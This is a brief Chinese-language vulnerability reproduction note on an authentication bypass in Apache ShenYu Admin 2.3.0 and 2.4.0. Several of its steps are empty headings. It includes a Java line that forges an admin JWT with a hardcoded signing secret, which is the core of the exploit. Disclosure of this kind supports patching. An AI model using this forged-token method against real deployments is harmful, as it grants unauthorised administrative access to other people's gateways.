Apache ShenYu 是应用于所有微服务场景的,可扩展、高性能、响应式的 API 网关解决方案。
Apache ShenYu Admin 存在身份验证绕过漏洞。 ShenyuAdminBootstrap 中 JWT 的错误使用允许攻击者绕过身份验证,攻击者可通过该漏洞直接进入系统后台。
0x02 漏洞版本
Apache ShenYu 2.3.0
Apache ShenYu 2.4.0
0x03 漏洞复现
启动环境

访问链接:

脚本验证:

登录。

关键点是生成 admin 账号的 jwt token。
System.out.println(JWT.create().withClaim("userName", "admin").withExpiresAt(new Date()).sign(Algorithm.HMAC256("2095132720951327")));
脚本: